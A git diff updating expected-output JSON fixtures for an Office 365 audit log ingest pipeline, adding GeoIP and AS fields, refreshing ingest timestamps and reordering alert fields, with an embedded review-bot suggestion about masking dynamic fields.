@@ -183,7 +180,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:44.905434200Z", + "ingested": "2021-12-14T14:49:41.313671288Z", "original": "{\"CreationTime\":\"2020-02-17T16:59:44\",\"Id\":\"3350cfd2-1020-5b11-99d8-2701f3a29ea3\",\"ItemName\":\"SIEMTest\",\"Members\":[{\"DisplayName\":\"Alan Smithee\",\"Role\":2,\"UPN\":\"asr@testsiem.onmicrosoft.com\"}],\"Operation\":\"MemberAdded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":25,\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"TeamName\":\"SIEMTest\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"}", "code": "MicrosoftTeams", "provider": "MicrosoftTeams", @@ -207,6 +204,9 @@ "email": "asr@testsiem.onmicrosoft.com", "domain": "testsiem.onmicrosoft.com" }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "SIEMTest" } @@ -241,7 +241,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:44.905438900Z", + "ingested": "2021-12-14T14:49:41.313671713Z", "original": "{\"CreationTime\":\"2020-02-17T16:59:34\",\"Id\":\"d7636db2-859f-437e-8dff-573726578ad7\",\"ObjectId\":\"Unknown (Unknown)\",\"Operation\":\"TeamsSessionStarted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":25,\"UserId\":\"bob@testsiem.onmicrosoft.com\",\"UserKey\":\"d0e0cfb0-284d-4b0a-83fe-dd543a1c1ed0\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"}", "code": "MicrosoftTeams", "provider": "MicrosoftTeams", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json index 5c2138c99c5..03c67e559e4 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json 
+++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json @@ -2,6 +2,18 @@ "expected": [ { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -75,7 +87,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:45.343188600Z", + "ingested": "2021-12-14T14:49:41.725625601Z", "original": "{\"CreationTime\":\"2021-02-05T09:06:07\",\"Id\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"RecordType\":15,\"ResultStatus\":\"Success\",\"UserKey\":\"21119711-1517-43d4-8138-b537dafad016\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\",\"ClientIP\":\"67.43.156.13\",\"ObjectId\":\"Unknown\",\"UserId\":\"root@testsiem4.onmicrosoft.com\",\"AzureActiveDirectoryEventType\":1,\"ExtendedProperties\": \"-Name \"foo\" -Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery \"(c:c)(senderauthor=abc@foo.com)\"\",\"ModifiedProperties\":[],\"Actor\":[{\"ID\":\"21119711-1517-43d4-8138-b537dafad016\",\"Type\":0},{\"ID\":\"root@testsiem4.onmicrosoft.com\",\"Type\":5}],\"ActorContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ActorIpAddress\":\"67.43.156.13\",\"InterSystemsId\":\"df4c6d6c-4551-4f2d-8766-03700dfccb47\",\"IntraSystemId\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"ErrorNumber\":\"0\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -148,7 +160,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:45.343199Z", + "ingested": "2021-12-14T14:49:41.725628038Z", "original": "{\"OriginatingServer\": \"HE1PR0102MB3228 (67.43.156.13)\", \"ClientAppId\": \"\", \"OrganizationName\": \"testsiem.onmicrosoft.com\", \"ObjectId\": \"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\", \"Parameters\": \"-StartReceivedDate \"4/25/2021 7:00:00 AM\" -EndReceivedDate \"5/27/2021 7:00:00 AM\" -StartExpiresDate \"5/26/2021 7:00:00 AM\" -EndExpiresDate \"6/26/2021 7:00:00 AM\" -PageSize \"100\" -Page \"1\" -MyItems \"True\" -QuarantineTypes (\"Bulk\",\"Spam\",\"Phish\")\", \"Workload\": \"Exchange\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"CreationTime\": \"2020-02-07T20:49:49\", \"AppId\": \"\", \"UserId\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"UserType\": 3, \"Version\": 1, \"ResultStatus\": \"True\", \"ExternalAccess\": true, \"UserKey\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"Operation\": \"Set-Mailbox\", \"Id\": \"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\", \"RecordType\": 1}", "code": "ExchangeAdmin", "provider": "Exchange", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sec-comp-alerts-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sec-comp-alerts-events.json-expected.json index 61c420accc6..ef8813d18c6 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sec-comp-alerts-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sec-comp-alerts-events.json-expected.json 
@@ -1,21 +1,6 @@ { "expected": [ { - "rule": { - "reference": [ - "http://example.net/alert", - "http://example.net/info" - ], - "name": "Elevation of Exchange admin privilege", - "ruleset": "User", - "description": "asr@testsiem.onmicrosoft.com", - "id": "17d51759-88e1-40c1-8df3-20bcf2e43057", - "category": "AccessGovernance" - }, - "message": "New alert", - "tags": [ - "preserve_original_event" - ], "o365": { "audit": { "Status": "Active", 
@@ -46,8 +31,20 @@ "name": "mytenant.onmicrosoft.com", "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, + "rule": { + "reference": [ + "http://example.net/alert", + "http://example.net/info" + ], + "name": "Elevation of Exchange admin privilege", + "ruleset": "User", + "description": "asr@testsiem.onmicrosoft.com", + "id": "17d51759-88e1-40c1-8df3-20bcf2e43057", + "category": "AccessGovernance" + }, + "message": "New alert", "event": { - "ingested": "2021-12-09T13:42:45.620853800Z", + "ingested": "2021-12-14T14:49:42.032344887Z", "original": "{\"AlertEntityId\":\"asr@testsiem.onmicrosoft.com\",\"AlertId\":\"5ba6e029-8b6e-13bd-b800-08d7b180173c\",\"AlertLinks\":[{\"AlertLinkHref\":\"http://example.net/alert\"},{\"AlertLinkHref\":\"http://example.net/info\"}],\"AlertType\":\"System\",\"Category\":\"AccessGovernance\",\"Comments\":\"New alert\",\"CreationTime\":\"2020-02-14T19:00:00\",\"Data\":\"{\\\"etype\\\":\\\"User\\\",\\\"eid\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"tid\\\":\\\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\\\",\\\"ts\\\":\\\"2020-02-14T18:54:45.0000000Z\\\",\\\"te\\\":\\\"2020-02-14T18:54:45.0000000Z\\\",\\\"op\\\":\\\"GrantAdminPermission\\\",\\\"tdc\\\":\\\"1\\\",\\\"suid\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"ut\\\":\\\"Admin\\\",\\\"lon\\\":\\\"GrantAdminPermission\\\"}\",\"EntityType\":\"User\",\"Id\":\"448854d7-81f6-4a06-d31a-08d7b1c1fb2f\",\"Name\":\"Elevation of Exchange admin privilege\",\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"AlertEntityGenerated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"PolicyId\":\"17d51759-88e1-40c1-8df3-20bcf2e43057\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"Severity\":\"Low\",\"Source\":\"Office 365 Security \\u0026 Compliance\",\"Status\":\"Active\",\"UserId\":\"SecurityComplianceAlerts\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "SecurityComplianceAlerts", "provider": 
"SecurityComplianceCenter", @@ -64,21 +61,12 @@ }, "user": { "id": "SecurityComplianceAlerts" - } - }, - { - "rule": { - "reference": [ - "http://example.net/single" - ], - "name": "Elevation of Exchange admin privilege", - "id": "17d51759-88e1-40c1-8df3-20bcf2e43057", - "category": "AccessGovernance" }, - "message": "New alert", "tags": [ "preserve_original_event" - ], + ] + }, + { "o365": { "audit": { "Status": "Active", 
@@ -109,8 +97,17 @@ "name": "mytenant.onmicrosoft.com", "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, + "rule": { + "reference": [ + "http://example.net/single" + ], + "name": "Elevation of Exchange admin privilege", + "id": "17d51759-88e1-40c1-8df3-20bcf2e43057", + "category": "AccessGovernance" + }, + "message": "New alert", "event": { - "ingested": "2021-12-09T13:42:45.620863900Z", + "ingested": "2021-12-14T14:49:42.032347664Z", "original": "{\"AlertId\":\"5ba6e029-8b6e-13bd-b800-08d7b180173c\",\"AlertLinks\":[{\"AlertLinkHref\":\"http://example.net/single\"}],\"AlertType\":\"System\",\"Category\":\"AccessGovernance\",\"Comments\":\"New alert\",\"CreationTime\":\"2020-02-14T19:00:00\",\"Data\":\"{\\\"f3u\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"ts\\\":\\\"2020-02-14T18:45:00.0000000Z\\\",\\\"te\\\":\\\"2020-02-14T19:00:00.0000000Z\\\",\\\"op\\\":\\\"GrantAdminPermission\\\",\\\"wl\\\":\\\"Exchange\\\",\\\"tid\\\":\\\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\\\",\\\"tdc\\\":\\\"1\\\",\\\"reid\\\":\\\"23a5e271-e297-4f35-ff57-08d7b17f5bf2\\\",\\\"rid\\\":\\\"f81f1b69-dc60-4ded-918e-e17d5c73b29f\\\",\\\"cid\\\":\\\"17d51759-88e1-40c1-8df3-20bcf2e43057\\\",\\\"ad\\\":\\\"This alert is triggered when someone in your organization becomes an Exchange admin or gets new Exchange admin permissions -V1.0.0.1\\\",\\\"lon\\\":\\\"GrantAdminPermission\\\",\\\"an\\\":\\\"Elevation of Exchange admin privilege\\\",\\\"sev\\\":\\\"Low\\\"}\",\"Id\":\"7d6297b5-e4a7-46f0-3c1e-08d7b1c1fb22\",\"Name\":\"Elevation of Exchange admin privilege\",\"ObjectId\":\"5ba6e029-8b6e-13bd-b800-08d7b180173c\",\"Operation\":\"AlertTriggered\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"PolicyId\":\"17d51759-88e1-40c1-8df3-20bcf2e43057\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"Severity\":\"Low\",\"Source\":\"Office 365 Security \\u0026 
Compliance\",\"Status\":\"Active\",\"UserId\":\"SecurityComplianceAlerts\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "SecurityComplianceAlerts", "provider": "SecurityComplianceCenter", @@ -127,20 +124,12 @@ }, "user": { "id": "SecurityComplianceAlerts" - } - }, - { - "rule": { - "name": "Phony Malware Alert", - "ruleset": "MalwareFamily", - "description": "Malware/Evil.Malware.B", - "id": "17d51759-88e1-40c1-8df3-20bcf2e43057", - "category": "ThreatManagement" }, - "message": "This is a phony threat alert", "tags": [ "preserve_original_event" - ], + ] + }, + { "o365": { "audit": { "Status": "Active", 
@@ -171,8 +160,16 @@ "name": "mytenant.onmicrosoft.com", "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, + "rule": { + "name": "Phony Malware Alert", + "ruleset": "MalwareFamily", + "description": "Malware/Evil.Malware.B", + "id": "17d51759-88e1-40c1-8df3-20bcf2e43057", + "category": "ThreatManagement" + }, + "message": "This is a phony threat alert", "event": { - "ingested": "2021-12-09T13:42:45.620869900Z", + "ingested": "2021-12-14T14:49:42.032348169Z", "original": "{\"AlertEntityId\":\"Malware/Evil.Malware.B\",\"AlertId\":\"1233344-8b6e-13bd-b800-08d7b180173c\",\"AlertLinks\":[],\"AlertType\":\"System\",\"Category\":\"ThreatManagement\",\"Comments\":\"This is a phony threat alert\",\"CreationTime\":\"2020-02-14T19:00:00\",\"Data\":\"{\\\"something\\\":\\\"blabla\\\"}\",\"EntityType\":\"MalwareFamily\",\"Id\":\"7d6297b5-e4a7-46f0-3c1e-08d7b1c1fb22\",\"Name\":\"Phony Malware Alert\",\"ObjectId\":\"12345678-8b6e-13bd-b800-08d7b180173c\",\"Operation\":\"AlertTriggered\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"PolicyId\":\"17d51759-88e1-40c1-8df3-20bcf2e43057\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"Severity\":\"High\",\"Source\":\"Office 365 Security \\u0026 Compliance\",\"Status\":\"Active\",\"UserId\":\"SecurityComplianceAlerts\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "SecurityComplianceAlerts", "provider": "SecurityComplianceCenter", @@ -189,7 +186,10 @@ }, "user": { "id": "SecurityComplianceAlerts" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json-expected.json index 221a8449059..7895ad7fa36 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json-expected.json 
+++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json-expected.json @@ -2,6 +2,18 @@ "expected": [ { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -53,7 +65,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:45.953082200Z", + "ingested": "2021-12-14T14:49:42.359170961Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePoint", "provider": "OneDrive", @@ -90,6 +102,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -141,7 +165,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:45.953091200Z", + "ingested": "2021-12-14T14:49:42.359174092Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePoint", "provider": "OneDrive", @@ -178,6 +202,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -229,7 +265,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:45.953097300Z", + "ingested": "2021-12-14T14:49:42.359174581Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePoint", "provider": "OneDrive", @@ -266,6 +302,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -317,7 +365,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:45.953101800Z", + "ingested": "2021-12-14T14:49:42.359175080Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePoint", "provider": "OneDrive", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json-expected.json index b6cf244dbcf..1e2b9c0e303 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json-expected.json @@ -2,6 +2,18 @@ "expected": [ { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { 
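Review bot: The `event.ingested` values rewritten in every hunk of this section (and likewise in the sharepointfileop and sp-sharing-op sections that follow) are run-time timestamps, so these expected files will diff again on every regeneration even when the pipeline is unchanged. If the pipeline test runner's per-test config supports masking dynamic fields, declaring `event.ingested` there (e.g. `dynamic_fields: {event.ingested: ".*"}` in the test's `-config.yml`) would keep the fixtures stable and leave only real output changes, such as the new `source.geo`/`source.as` blocks, to review. Those geo and AS values for `67.43.156.15` appear to come from a test lookup database rather than live data; a short note in the test config saying so would stop a later reader from treating Bhutan/AS35908 as a genuine attribution of that address.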
@@ -61,7 +73,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865144800Z", + "ingested": "2021-12-14T14:49:43.390656043Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -100,6 +112,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { 
@@ -159,7 +183,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865153400Z", + "ingested": "2021-12-14T14:49:43.390658486Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -198,6 +222,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { 
@@ -257,7 +293,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865159200Z", + "ingested": "2021-12-14T14:49:43.390659004Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -296,6 +332,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { 
